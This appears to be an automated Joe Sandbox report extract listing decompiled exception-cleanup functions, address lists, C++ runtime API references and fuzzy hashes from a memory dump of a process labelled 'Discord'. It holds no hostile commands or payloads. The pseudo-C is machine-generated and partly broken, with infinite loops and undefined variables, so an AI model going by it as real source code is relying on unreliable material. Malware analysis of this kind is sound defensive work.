0x6de8bf05
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf04

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 4d787fada7fa25728e9590a611470f95764f5a7858ea9b7cddf3f09def2d9f2b
Instruction ID: c9507797afd79ded8b7919061cef01840ce7ec2a2f1d679c5450d5ed21250418
Opcode Fuzzy Hash: 4d787fada7fa25728e9590a611470f95764f5a7858ea9b7cddf3f09def2d9f2b
Instruction Fuzzy Hash: 93311BB4848A10CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB302A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BFF8 Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8BFF8() {
				intOrPtr _t31;
				intOrPtr _t38;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
					_t38 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t38);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t38;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
				}
			}

0x6de8bff8
0x6de8bffa
0x6de8bf17
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf16

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: d03a222f96c6636f3e4a482c8e2ec10f54e4f732fc018bd11cdecfe9d97b5d64
Instruction ID: 3aa1c8672a332b4e9fea742cac07e67734701ef09cb645d4ce79e2cedbc8e202
Opcode Fuzzy Hash: d03a222f96c6636f3e4a482c8e2ec10f54e4f732fc018bd11cdecfe9d97b5d64
Instruction Fuzzy Hash: BE311BB4848A10CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB301A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BFC4 Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8BFC4() {
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
					_t42 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t42);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t42;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
				}
			}

0x6de8bfc4
0x6de8bfc6
0x6de8becf
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bece

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: c0a699904c4247c0297eb8b9d7516e2913352bf1ddb0c9fa9a6476a9c2edf133
Instruction ID: 4745078079239202614440f4417456daaeaa62810569d6bc2fd5daf0101be34a
Opcode Fuzzy Hash: c0a699904c4247c0297eb8b9d7516e2913352bf1ddb0c9fa9a6476a9c2edf133
Instruction Fuzzy Hash: F2311BB4848A14CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB302A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BFDE Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8BFDE() {
				intOrPtr _t31;
				intOrPtr _t40;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
					_t40 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t40);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t40;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
				}
			}

0x6de8bfde
0x6de8bfe0
0x6de8bef3
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef2

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: ba083192e873bcfa3ea8f301dc076434832ed3582fd343fc25a1492d845cf86c
Instruction ID: 23c703c71b0185de10c173d25847fa341ab610c5037060a3dadc0b3f58315ef8
Opcode Fuzzy Hash: ba083192e873bcfa3ea8f301dc076434832ed3582fd343fc25a1492d845cf86c
Instruction Fuzzy Hash: 99311BB4848A14CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB301A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BFD1 Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8BFD1() {
				intOrPtr _t31;
				intOrPtr _t41;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
					_t41 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t41);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t41;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
				}
			}

0x6de8bfd1
0x6de8bfd3
0x6de8bee1
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee0

APIs

